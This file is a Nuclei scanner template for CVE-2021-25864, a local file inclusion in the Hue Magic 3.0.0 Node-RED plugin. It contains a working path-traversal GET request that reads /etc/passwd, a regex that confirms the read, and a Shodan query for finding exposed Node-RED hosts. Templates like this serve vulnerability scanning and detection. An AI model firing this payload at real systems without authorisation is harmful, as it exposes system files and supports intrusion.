nuclei-templates/http/cves/2021/CVE-2021-25864.yaml

40 lines
1.1 KiB
YAML
Raw Normal View History

id: CVE-2021-25864
info:
name: Hue Magic 3.0.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.
reference:
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://nvd.nist.gov/vuln/detail/CVE-2021-25864
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
epss-score: 0.55044
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:node-red-contrib-huemagic_project:node-red-contrib-huemagic:3.0.0:*:*:*:*:node.js:*:*
metadata:
max-request: 1
shodan-query: title:"NODE-RED"
2023-07-11 19:49:27 +00:00
framework: node.js
vendor: node-red-contrib-huemagic_project
product: node-red-contrib-huemagic
tags: cve,cve2021,huemagic,lfi
http:
- method: GET
path:
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200